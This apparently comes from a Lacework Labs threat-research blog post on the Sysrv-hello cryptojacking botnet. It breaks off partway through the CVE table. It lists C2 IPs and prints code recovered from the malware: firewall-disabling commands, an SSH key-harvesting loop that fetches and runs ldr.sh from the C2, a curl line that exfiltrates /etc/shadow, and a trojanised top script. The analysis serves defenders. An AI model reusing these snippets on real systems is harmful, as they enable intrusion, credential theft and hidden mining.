                              <div class="nav-item-primary-dropdown-tab " id="pni1-tab3"><i class="fa-solid fa-gear" style="margin-right: 8px;"></i> Technology</div>
                            </div>

        <div class="tabs-content">
                          <div class="nav-item-primary-dropdown-container pni1-tab1 active">
            <div class="mobile-nav-back-tabs"><i class="fa-solid fa-chevron-left"></i> Back </div>
                        <div class="tab-description">Polygraph<sup>&reg</sup> Data Platform <div style="margin-top: 1.5rem;font-size: 1.75rem;color:#888;">Data-driven protection from code to cloud, all in one place</div></div>
                        <div class="col-left">
                            <a href="/platform/"><span class="nav-item-eyebrow">CNAPP</span>Cloud-Native Application Protection Platform <span class="nav-item-desc">Secure across the entire application lifecycle </span></a>
                            <a href="/solutions/infrastructure-as-code/"><span class="nav-item-eyebrow">IaC</span>Infrastructure-as-Code Security <span class="nav-item-desc">Fix misconfigurations at the earliest possible point</span></a>
                            <a href="/platform/kubernetes/"><span class="nav-item-eyebrow">K8s</span>Kubernetes Security  <span class="nav-item-desc">Find risks and threats in your K8s clusters</span></a>
                            <a href="/solutions/container-security/">Container Security  <span class="nav-item-desc">Visibility into complex host and container activity</span></a>
                          </div>
            <div class="col-right">
                            <a href="/platform/cloud-security-posture-and-compliance/"><span class="nav-item-eyebrow">CSPM</span>Cloud Security Posture Management <span class="nav-item-desc">Assess risks and optimize your cloud security posture </span></a>
                            <a href="/platform/threat-detection/"><span class="nav-item-eyebrow">CWPP</span>Cloud Workload Protection Platform <span class="nav-item-desc">Monitor workloads continuously for threats</span></a>
                            <a href="/platform/vulnerability-management/">Vulnerability Management <span class="nav-item-desc">Find and fix vulnerabilities in build time and runtime</span></a>
                            <a href="/solutions/audit-compliance/">Cloud Compliance <span class="nav-item-desc">Streamline audits to meet industry standards </span></a>
                          </div>
          </div>
                          <div class="nav-item-primary-dropdown-container pni1-tab2 ">
            <div class="mobile-nav-back-tabs"><i class="fa-solid fa-chevron-left"></i> Back </div>
                        <div class="col-left">
                            <a href="/platform/aws/">Amazon Web Services (AWS) <span class="nav-item-desc">Simplify security for Amazon Web Services</span></a>
                            <a href="/platform/google-cloud/">Google Cloud <span class="nav-item-desc">Automate security for Google Cloud</span></a>
                          </div>
            <div class="col-right">
                            <a href="/platform/microsoft-azure/">Microsoft Azure <span class="nav-item-desc">Continuously secure Microsoft Azure apps</span></a>
                            <a href="/platform/multicloud/">Multicloud <span class="nav-item-desc">Protection across multicloud and hybrid</span></a>
                          </div>
          </div>
                          <div class="nav-item-primary-dropdown-container pni1-tab3 ">
            <div class="mobile-nav-back-tabs"><i class="fa-solid fa-chevron-left"></i> Back </div>
                        <div class="col-left">
                            <a href="/platform/deployment/">Data Ingestion   <span class="nav-item-desc">See more with combined agentless and agent-based approach</span></a>
                            <a href="/solutions/integrations/">Integrations <span class="nav-item-desc">Supercharge productivity by integrating with your existing workflows</span></a>
                          </div>
            <div class="col-right">
                            <a href="/platform/polygraph/">Polygraph<sup>&reg;</sup>: Behavioral Analytics Engine  <span class="nav-item-desc">Automatically find and know your normal with our patented machine-learning technology</span></a>
                          </div>
          </div>
                  
                </div>
      
      <!-- End if tabbed nav is true -->
      

    <a href="/get-started/" class="button button--outline">Get started</a>
  </div>
</div>
                    <div class="flyout" data-flyout="flyout-2">
  <div class="wrapper flyout-wrapper">
    <div class="flyout__mobile-toggle nav-item-primary"><a href="/solutions">Solutions</a><span class="icon-chevron" data-flyout-trigger="flyout-2"></span></div>
      
                      <div class="tabs">
                              <div class="nav-item-primary-dropdown-tab active-tab" id="pni2-tab1"><i class="fa-duotone fa-industry" style="margin-right: 8px;"></i> Industry & Size</div>
                              <div class="nav-item-primary-dropdown-tab " id="pni2-tab2"><i class="fa-duotone fa-user" style="margin-right: 8px;"></i> User Role</div>
                            </div>

        <div class="tabs-content">
                          <div class="nav-item-primary-dropdown-container pni2-tab1 active">
            <div class="mobile-nav-back-tabs"><i class="fa-solid fa-chevron-left"></i> Back </div>
                        <div class="col-left">
                            <a href="/solutions/cloud-security-for-healthtech/">HealthTech  <span class="nav-item-desc">Protect healthcare data and demonstrate HIPAA compliance</span></a>
                            <a href="/cloud-security-and-compliance-for-the-gaming-industry/">Gaming <span class="nav-item-desc">Secure player data while speeding game development</span></a>
                          </div>
            <div class="col-right">
                            <a href="/solutions/cloud-security-fintech/">FinTech  <span class="nav-item-desc">Prevent cybercrime with safe financial transactions</span></a>
                            <a href="/solutions/cloud-security-for-startups/">Cloud Security for Startups <span class="nav-item-desc">Automate processes to accelerate small business growth</span></a>
                          </div>
          </div>
                          <div class="nav-item-primary-dropdown-container pni2-tab2 ">
            <div class="mobile-nav-back-tabs"><i class="fa-solid fa-chevron-left"></i> Back </div>
                        <div class="col-left">
                            <a href="/solutions/security-user/">Security <span class="nav-item-desc">Pinpoint cloud issues, with rich context to act fast</span></a>
                          </div>
            <div class="col-right">
                            <a href="/solutions/developer/">Developer <span class="nav-item-desc">Build faster with continuous security and deep visibility</span></a>
                          </div>
          </div>
                  
                </div>
      
      <!-- End if tabbed nav is true -->
      

    <a href="/get-started/" class="button button--outline">Get started</a>
  </div>
</div>
                    <div class="flyout" data-flyout="flyout-3">
  <div class="wrapper flyout-wrapper">
    <div class="flyout__mobile-toggle nav-item-primary"><a href="/customers">Customers</a><span class="icon-chevron" data-flyout-trigger="flyout-3"></span></div>
      
          
    <!-- OG Dropdown -->
    <div class="flyout__column flyout__column--featured">
      <h4>Our Customers</h4>
      <div><p>Lacework is trusted by the most innovative companies across the globe.</p>
</div>
              <a class="button button--link" href="/customers">Explore Success Stories</a>
          </div>
                  <div class="flyout__column flyout__column--listing">
          <h5>Customer Success</h5>
          <ul>
                          <li><a href="/customers">Case Studies</a></li>
                          <li><a href="https://academy.lacework.com/" target="_blank">Training:<br/>Lacework Academy</a></li>
                          <li><a href="https://docs.lacework.com/" target="_blank">Product Documentation</a></li>
                      </ul>
        </div>
                    
                        <div class="flyout__column flyout__column--listing">
          <h5>Customer Support</h5>
          <ul>
                          <li><a href="https://support.lacework.com/hc/en-us">Support</a></li>
                          <li><a href="https://login.lacework.net/">Login</a></li>
                          <li><a href="/contact">Contact Us</a></li>
                      </ul>
        </div>
                    
                              
              <div class="flyout__column flyout__column--callout">
          <div class="callout-card">
                          <img src="https://www.lacework.com/wp-content/uploads/2022/03/Pocket-Gems_031022.png" alt="Pocket Gems protects customer data and improves vulnerability detection">
                        <h4>Pocket Gems protects customer data and improves vulnerability detection</h4>
            <a class="button button--link" href="https://info.lacework.com/case-study-pocket-gems.html?utm_source=website&utm_medium=case-studies&utm_campaign=website-resources" target="_blank">Read the Case Study</a>
          </div>
        </div>
              <!-- End OG Dropdown -->
    

    <a href="/get-started/" class="button button--outline">Get started</a>
  </div>
</div>
                    <div class="flyout" data-flyout="flyout-4">
  <div class="wrapper flyout-wrapper">
    <div class="flyout__mobile-toggle nav-item-primary"><a href="/partners">Partners</a><span class="icon-chevron" data-flyout-trigger="flyout-4"></span></div>
      
          
    <!-- OG Dropdown -->
    <div class="flyout__column flyout__column--featured">
      <h4>Lacework Partner Program</h4>
      <div><p>We are helping our partners build successful and profitable cloud security practices to help meet the adoption of cloud.</p>
</div>
              <a class="button button--link" href="/partners">Learn More</a>
          </div>
                  <div class="flyout__column flyout__column--listing">
          <h5>Channel Partners</h5>
          <ul>
                          <li><a href="/partners">Lacework Partner Program</a></li>
                          <li><a href="/partners/search-partner/">Find a Partner</a></li>
                          <li><a href="https://partners.lacework.com/" target="_blank">Partner Portal - Login</a></li>
                      </ul>
        </div>
                    
                        <div class="flyout__column flyout__column--listing">
          <h5>Strategic Alliances</h5>
          <ul>
                          <li><a href="/partners/strategic-alliances">Lacework Alliances</a></li>
                      </ul>
        </div>
                    
                              
              <div class="flyout__column flyout__column--callout">
          <div class="callout-card">
                          <img src="https://www.lacework.com/wp-content/uploads/2022/04/Lacework_WP_Ransomware_Rising-_040422_V4-resource-card-co-brand-1.png" alt="Get insights into the current ransomware landscape and best practices to reduce your risk.">
                        <h4>Get insights into the current ransomware landscape and best practices to reduce your risk.</h4>
            <a class="button button--link" href="https://info.lacework.com/aws-battle-ransomware-in-cloud?utm_source=website&utm_medium=whitepaper&utm_campaign=website-resources" target="_blank">Learn more</a>
          </div>
        </div>
              <!-- End OG Dropdown -->
    

    <a href="/get-started/" class="button button--outline">Get started</a>
  </div>
</div>
                    <div class="flyout" data-flyout="flyout-5">
  <div class="wrapper flyout-wrapper">
    <div class="flyout__mobile-toggle nav-item-primary"><a href="/resources">Resources</a><span class="icon-chevron" data-flyout-trigger="flyout-5"></span></div>
      
          
    <!-- OG Dropdown -->
    <div class="flyout__column flyout__column--featured">
      <h4>Resources</h4>
      <div><p>Learn about Lacework&#8217;s modern approach to cloud security with Blogs, Case Studies, Videos, eBooks, Webinars, and White Papers.</p>
</div>
              <a class="button button--link" href="/resources">Explore Resources Library</a>
          </div>
                  <div class="flyout__column flyout__column--listing">
          <h5>Resources & Insights</h5>
          <ul>
                          <li><a href="/blog">Blog</a></li>
                          <li><a href="/customers">Case Studies</a></li>
                          <li><a href="/resources/industry-reports">Industry Reports</a></li>
                          <li><a href="/resources/infographics">Infographics</a></li>
                          <li><a href="/resources/solution-briefs">Solution Briefs</a></li>
                          <li><a href="/resources/videos">Videos</a></li>
                          <li><a href="/resources/ebooks">eBooks</a></li>
                          <li><a href="/resources/whitepapers">White Papers</a></li>
                          <li><a href="/resources/webinars">Webinars</a></li>
                      </ul>
        </div>
                    
                        <div class="flyout__column flyout__column--listing">
          <h5>Training & Documentation</h5>
          <ul>
                          <li><a href="https://academy.lacework.com/" target="_blank">Lacework Academy</a></li>
                          <li><a href="https://docs.lacework.com/" target="_blank">Documentation</a></li>
                      </ul>
        </div>
                    
                              
              <div class="flyout__column flyout__column--callout">
          <div class="callout-card">
                          <img src="https://www.lacework.com/wp-content/uploads/2022/10/Cloud_Threat_Report_Vol4_EN_resource-card.jpg" alt="Get insights into some of the main trends in the cloud threat landscape.">
                        <h4>Get insights into some of the main trends in the cloud threat landscape.</h4>
            <a class="button button--link" href="/resources/industry-reports/cloud-threat-report/">Cloud Threat Report, Volume 4</a>
          </div>
        </div>
              <!-- End OG Dropdown -->
    

    <a href="/get-started/" class="button button--outline">Get started</a>
  </div>
</div>
                    <div class="flyout" data-flyout="flyout-6">
  <div class="wrapper flyout-wrapper">
    <div class="flyout__mobile-toggle nav-item-primary"><a href="/about-us/">Company</a><span class="icon-chevron" data-flyout-trigger="flyout-6"></span></div>
      
          
    <!-- OG Dropdown -->
    <div class="flyout__column flyout__column--featured">
      <h4>Company</h4>
      <div><p>We are changing the future of cloud security with automation and data so our customers can innovate with speed and safety.</p>
</div>
              <a class="button button--link" href="/about-us">Learn more about Lacework</a>
          </div>
                  <div class="flyout__column flyout__column--listing">
          <h5>Newsroom & Events</h5>
          <ul>
                          <li><a href="/press-releases">Press Releases</a></li>
                          <li><a href="/in-the-news">In the News</a></li>
                          <li><a href="/events">Events</a></li>
                          <li><a href="/awards">Awards</a></li>
                          <li><a href="/media-library/">Media Library</a></li>
                      </ul>
        </div>
                    
                        <div class="flyout__column flyout__column--listing">
          <h5>People</h5>
          <ul>
                          <li><a href="/about-us/#leadership">Leadership</a></li>
                          <li><a href="/investors">Investors</a></li>
                          <li><a href="/labs/">Lacework Labs</a></li>
                          <li><a href="/careers">Careers</a></li>
                      </ul>
        </div>
                    
                        <div class="flyout__column flyout__column--listing">
          <h5>Responsibility</h5>
          <ul>
                          <li><a href="/legal">Legal</a></li>
                          <li><a href="/privacy-policy">Security & Privacy</a></li>
                          <li><a href="/trust">Trust</a></li>
                      </ul>
        </div>
                    
              <!-- End OG Dropdown -->
    

    <a href="/get-started/" class="button button--outline">Get started</a>
  </div>
</div>
          </header>

    <main class="post-template">
	<section class="hero gradient">
		<div class="wrapper">
			<h1 class="">Sysrv-Hello Expands Infrastructure</h1>
										<p class="author">Lacework Labs</p>
										<p class="date">April 22, 2021</p>
								</div>
	</section>
	<section class="post-template__content">
		<div class="wrapper">
			<p>&nbsp;</p>
<p><strong>Chris Hall and Jared Stroud<br />
Cloud Security Researchers, Lacework Labs</strong></p>
<p>&nbsp;</p>
<p>Sysrv-hello is a multi-architecture Cryptojacking (<a href="https://attack.mitre.org/techniques/T1496/" target="_blank" rel="noopener">T1496</a>) botnet that first emerged in late 2020, and employs Golang malware compiled into both Linux and Windows payloads. The malware is equal parts XMRig cryptominer and aggressive botnet-propagator. The propagator leverages MySQL and Tomcat brute forcing (<a href="https://attack.mitre.org/techniques/T1496/" target="_blank" rel="noopener">T1110</a>) along with a suite of exploits including those for Atlassian and Apache. The malware also leverages several &#8220;No CVE&#8221; command execution techniques including those for Jupyter notebook and Tomcat Manager.</p>
<h2>Key Points</h2>
<ul>
<li>Opportunistic actors are targeting cloud workloads through remote code injection/remote code execution vulnerabilities in <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9841" target="_blank" rel="noopener">PHPUnit</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-0193" target="_blank" rel="noopener">Apache Solar</a>, <a href="https://nvd.nist.gov/vuln/detail/cve-2019-3396" target="_blank" rel="noopener">Confluence</a>, <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3129." target="_blank" rel="noopener">Laravel</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-12149" target="_blank" rel="noopener">JBoss</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-11581" target="_blank" rel="noopener">Jira</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-7238" target="_blank" rel="noopener">Sonatype</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-14882" target="_blank" rel="noopener">Oracle WebLogic</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5638" target="_blank" rel="noopener">Apache Struts</a> to gain initial access (<a href="https://attack.mitre.org/techniques/T1190/" target="_blank" rel="noopener">T1190</a>).</li>
<li>Lateral movement is conducted via SSH keys available on the victim machine and hosts identified from bash history files, ssh config files, and known_hosts files. (<a href="https://attack.mitre.org/techniques/T1021/004/" target="_blank" rel="noopener">T1021.004</a>)</li>
<li>Based on the identified continually expanding C2 infrastructure and Windows compatible builds of the malware, potential for botnet expansion is likely as time continues.</li>
</ul>
<h2>Botnet Infrastructure</h2>
<p>First documented in early February by <a href="https://help.aliyun.com/document_detail/196163.html">Aliyun</a> as “Sysrv-hello”, the sysrv-hello botnet has since expanded with regards to the volume of specimens and C2 infrastructure. Since early March, five new botnet controllers have been identified with the most recent being IP 194.145.227.21. Most C2 IPs belong to either AS 48693 Rices Privately owned enterprise, or Des Capital B.V. &#8211; AS 213035 Des Capital B.V.</p>
<p>&nbsp;</p>
<table style="border-collapse: collapse; width: 100%; height: 230px;">
<thead>
<tr style="background-color: #e8e8e8;">
<th style="border-style: solid; border-color: #ffffff;" scope="row"><span style="font-weight: 400; padding-left: 5px;">C2</span></th>
<th style="width: 50%; text-align: center; height: 23px;" scope="row"><span style="font-weight: 400; padding-left: 5px;">C2</span></th>
</tr>
</thead>
<tbody>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">194.145.227.21</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">AS 48693 Rices Privately owned enterprise</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">194.40.243.98</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">AS 48693 Rices Privately owned enterprise</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">31.42.177.123</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">AS 43641 Sollutium EU LLC</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">31.210.20.181</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">AS 213035 Des Capital B.V.</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 4px;">185.239.242.71</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">AS 213035 Des Capital B.V.</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">31.210.20.120</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">AS 213035 Des Capital B.V.</span></td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<p><img loading="lazy" class="alignnone size-full wp-image-6986" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_001.jpg" alt="" width="802" height="772" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_001.jpg 802w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_001-300x289.jpg 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_001-768x739.jpg 768w" sizes="(max-width: 802px) 100vw, 802px" /></p>
<p>&nbsp;</p>
<p>Examination of SSH fingerprints data for the C2s uncovered a total of 26 servers that were likely compromised by Sysrv-hello at some point. One server &#8211; 185.76.147.189, was found to have historically used both SSH keys currently in use by Sysrv-hello, indicating they are likely unique to the botnet’s infrastructure. Shodan reports for IPs sharing the SSH keys show an even distribution of <a href="https://www.shodan.io/search?query=41%3Ac3%3A8d%3A22%3Ac1%3A32%3A7c%3A50%3A40%3A96%3A9d%3A1d%3A54%3Afe%3A74%3A86" target="_blank" rel="noopener">couch db and Mosquito/MQTT</a> so its possible these services were exploited by sysrv-hello actors.</p>
<p>&nbsp;</p>
<table style="border-collapse: collapse; width: 100%;">
<thead>
<tr style="background-color: #e8e8e8; border-style: solid; border-color: #fff;">
<td style="width: 33.333333333333336%; text-align: center; border-style: solid; border-color: #ffffff;" scope="row">C2</td>
<td style="width: 33.333333333333336%; text-align: center; border-style: solid; border-color: #ffffff;" scope="row">SSH fingerprint</td>
<td style="width: 33.333333333333336%; text-align: center; border-style: solid; border-color: #ffffff;" scope="row">total servers</td>
</tr>
</thead>
<tbody>
<tr>
<td style="width: 33.333333333333336%;">194.145.227.21</td>
<td style="width: 33.333333333333336%;">41:c3:8d:22:c1:32:7c:50:40:96:9d:1d:54:fe:74:86</td>
<td style="width: 33.333333333333336%;">24</td>
</tr>
<tr>
<td style="width: 33.333333333333336%;">31.210.20.120</td>
<td style="width: 33.333333333333336%;">08:e0:58:cf:13:6f:4e:42:3a:79:a7:14:63:19:0c:ce</td>
<td style="width: 33.333333333333336%;">2</td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<p>There were also indications that the C2 hosts were active participants in the exploitation process. Host 194.145.227.21 hosts an open FTP server which, at the time of this writing, hosted a file name cmd.vm. This file is a <a href="https://raw.githubusercontent.com/Yt1g3r/CVE-2019-3396_EXP/master/cmd.vm" target="_blank" rel="noopener">component</a> used in the template injection stage of the Atlassian Confluence Widget Connector exploit (CVE-2019-3396).</p>
<p>Another interesting tactic was custom user-agents specifying the CVE for a given exploit. In the example below, the XML component the Oracle WebLogic Server RCE included a curl request with the exploit’s CVE as a user-agent. This is strictly supplied for tracking purposes and doesn’t determine the server’s response.</p>
<p><center><img loading="lazy" class="alignnone size-full wp-image-6989" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003a.png" alt="" width="801" height="379" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003a.png 801w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003a-300x142.png 300w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_003a-768x363.png 768w" sizes="(max-width: 801px) 100vw, 801px" /></center>&nbsp;</p>
<h2>Initial Host Infection</h2>
<p>Host infection begins with a bash script (ldr.sh) that performs initial host triage prior to downloading the second stage ELF binary &#8211; sysrv. The initial bash script changes the default policy to the INPUT, OUTPUT and FORWARD <a href="https://ipset.netfilter.org/iptables.man.html" target="_blank" rel="noopener">IPTables’ chains</a> to accept before flushing any other firewall rules that exist (<a href="https://attack.mitre.org/techniques/T1562/004/" target="_blank" rel="noopener">T1562.004</a>). Next, the ldr script attempts to overwrite content within <span class="inlineCodeBlock">/etc/ld.so.preload</span> (<a href="https://attack.mitre.org/techniques/T1485/" target="_blank" rel="noopener">T1485</a>), as well as remove any static host entries for mining pools stored within<span class="inlineCodeBlock">/etc/hosts</span>.</p>
<pre><pre class="brush: bash; title: ; notranslate" title="">
ufw disable
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -F
chattr -ia /etc/ld.so.preload
echo &amp;amp;amp;amp;gt; /etc/ld.so.preload
chattr -ia /etc/hosts
sed -i '/f2pool.com\|nanopool.org\|minexmr.com\|supportxmr.com\|c3pool.com/d' /etc/hosts
</pre>
<p>After killing cryptocurrency miners via process name and removing the Aliyun agent (prevalent in Alibaba cloud environments), the second stage payload is downloaded. The second stage payload hosted on the staging server is prefixed with “sysrv”-ARCHITECTURE, where ARCHITECTURE is obtained via <span class="inlineCodeBlock">uname -m</span>. However, after the file is downloaded, the sysrv binary is renamed based on the output of the command below and then launched.</p>
<p><span class="inlineCodeBlock">sys=$(date |md5sum|awk -v n=”$(date +%s)” ‘{print substr($1,1,n%7+6)}’)</span></p>
<p>The bash script then proceeds to identify SSH private keys within <span class="inlineCodeBlock">/</span>, <span class="inlineCodeBlock">/root</span> and <span class="inlineCodeBlock">/home</span> to use for lateral movement (<a href="https://attack.mitre.org/techniques/T1021/004/" target="_blank" rel="noopener">T1021.004</a>) against IPv4 addresses identified within the user&#8217;s bash history,<span class="inlineCodeBlock">$USER/.ssh/known_hosts</span> and <span class="inlineCodeBlock">~/.ssh/config </span>files.</p>
<pre><pre class="brush: bash; title: ; notranslate" title="">
KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
</pre>
<p>In combination with the SSH keys above, a brute force approach of trying every user against every host with every key identified is performed. User’s on the victim host are identified via home directories with the <span class="inlineCodeBlock">find</span> command. If authentication is successful, a bash one-liner is executed to download and run the ldr.sh script on the new victim host.</p>
<pre><pre class="brush: bash; title: ; notranslate" title="">
USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh"
)
userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
for user in $userlist; do
    for host in $hostlist; do
        for key in $keylist; do
            chmod +r $key; chmod 400 $key
            ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl --user-agent localssh $cc/ldr.sh || wget --user-agent localssh -q -O - $cc/ldr.sh) | sh"
        done
    done
done
</pre>
<p>The Lacework Labs team also identified a curl statement commented out within ldr.sh that would have otherwise exfiltrated the <span class="inlineCodeBlock">/etc/shadow</span> file via a base64 encoded user-agent string to the server hosting ldr.sh and sysrv. In other various ldr.sh, this command did not have the comment and would be executed.</p>
<p><span class="inlineCodeBlock">#curl &#8211;user-agent shell_$(cat /etc/shadow|grep &#8220;\\$&#8221;|base64 -w0) $cc </span></p>
<p>Other ldr.sh scripts examined by the Lacework Labs team had slight differences in functionality. While all observed samples downloaded the 2nd stage payload of sysrv, some did not perform the lateral movement function. The Lacework Labs team assesses with moderate confidence the scripts are actively being modified while keeping the same filename of ldr.sh so that variants already deployed will still grab the hardcoded value of ldr.sh. This claim is supported by variations of ldr.sh being uploaded to <a href="https://www.virustotal.com/gui/url/3dbfc3a9cdf252137ee443462f26ea2fd2c4102b359e331a11ef14f623a13412/relations" target="_blank" rel="noopener">VirusTotal</a>.</p>
<p><center><img class="alignnone size-full wp-image-6990" src="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004a.png" alt="" width="600" srcset="https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004a.png 529w, https://www.lacework.com/wp-content/uploads/2021/04/sysrv_004a-300x69.png 300w" sizes="(max-width: 529px) 100vw, 529px" /></center></p>
<h2>Persistence on Host</h2>
<p>The sysrv binary dropped to disk is a statically linked 64bit UPX packed Golang ELF binary. This binary contains an embedded cryptocurrency miner, <a href="https://github.com/xmrig/xmrig" target="_blank" rel="noopener">XMRig</a> which is renamed to “<span class="inlineCodeBlock">[kthreaddi]</span>”. The sysrv binary finds a new writable location to drop itself to disk before adding a cron entry (<a href="https://attack.mitre.org/techniques/T1053/003/" target="_blank" rel="noopener">T1053.003</a>). Through multiple sysrv executions, a different cron entry was created each time during dynamic analysis. Each binary being written to disk is the same file as sysrv, with the exception of the newly created file not being UPX packed. The code blocks below show observed file locations sysrv was written to along with the corresponding cron entry.</p>
<pre><pre class="brush: bash; title: ; notranslate" title="">
* * * * * /home/user/.cache/mozilla/firefox/h2od1b24.default-esr/safebrowsing/6zf2ipl

* * * * * /home/user/.cache/pip/wheels/9d/29/32/q2cszj7oi

* * * * * /home/user/.cache/pip/http/c/0/9/8/a/dpm2fu
</pre>
<p>&nbsp;</p>
<p>Upon executing sysrv, the XMRig binary along with the mining configuration file is written to disk in the current directory of execution. Immediately after the execution of XMRig, the XMRig binary and the configuration file are removed via the <a href="https://man7.org/linux/man-pages/man2/unlinkat.2.html" target="_blank" rel="noopener">unlinkat syscall</a>.</p>
<pre><pre class="brush: bash; title: ; notranslate" title="">
unlinkat(AT_FDCWD, "/home/test/.cache/go-build/2f/.Vvqn9kgF/config.json", 0) = 0
unlinkat(AT_FDCWD, "/home/test/.cache/go-build/2f/.Vvqn9kgF/[kthreaddi]", 0) = 0
</pre>
<h2>Evading Detection on Host</h2>
<p>The ldr.sh bash script moves <span class="inlineCodeBlock">/usr/bin/top</span> to <span class="inlineCodeBlock">/usr/bin/top_</span> before creating a bash script at <span class="inlineCodeBlock">/usr/bin/top</span> which removes the XMRig miner (“<span class="inlineCodeBlock">[kthreaddi]</span> ”) from the process list via a grep command.</p>
<pre><pre class="brush: bash; title: ; notranslate" title="">
mv /usr/bin/top /usr/bin/top_
echo '#!/bin/sh
/usr/bin/top_ -p $(ps aux|grep -v "\[kthreaddi\]"|awk "{print \$2}"|grep -v PID|sort -R|head -n20|tr "\n" ","|sed s"/.$//")' &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt; /usr/bin/top
chmod +x /usr/bin/top
</pre>
<h2>Observed Capabilities of Sysrv</h2>
<p>File artifacts observed by the Lacework Labs team indicate the propagator has support for the following exploits:</p>
<p>&nbsp;</p>
<table style="border-collapse: collapse; width: 100%; height: 230px;">
<thead>
<tr style="background-color: #e8e8e8;">
<th style="width: 50%; height: 23px; text-align: center; border-style: solid; border-color: #ffffff;" scope="row"><span style="font-weight: 400; padding-left: 5px;">CVE</span></th>
<th style="width: 50%; text-align: center; height: 23px; border-style: solid; border-color: #ffffff;" scope="row"><span style="font-weight: 400; padding-left: 5px;">Description</span></th>
</tr>
</thead>
<tbody>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE 2017-9841</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Code injection vulnerability in Drupal component PHPUnit</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE 2019-0193</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Apache Solr Remote Code Execution Vulnerability</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE 2019-3396</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Vulnerability in Atlassian Confluence Widget Connector</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE 2021-3129</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Laravel ignition RCE</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE 2017-11610</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Vulnerability in XML-RPC server in Supervisor</span></td>
</tr>
<tr style="height: 23px;">
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">CVE 2017-12149</span></td>
<td style="width: 50%; height: 23px;"><span style="font-weight: 400; padding-left: 5px;">Red Hat JBoss RCE</span></td>
</tr>
<tr style="height: 23px;">
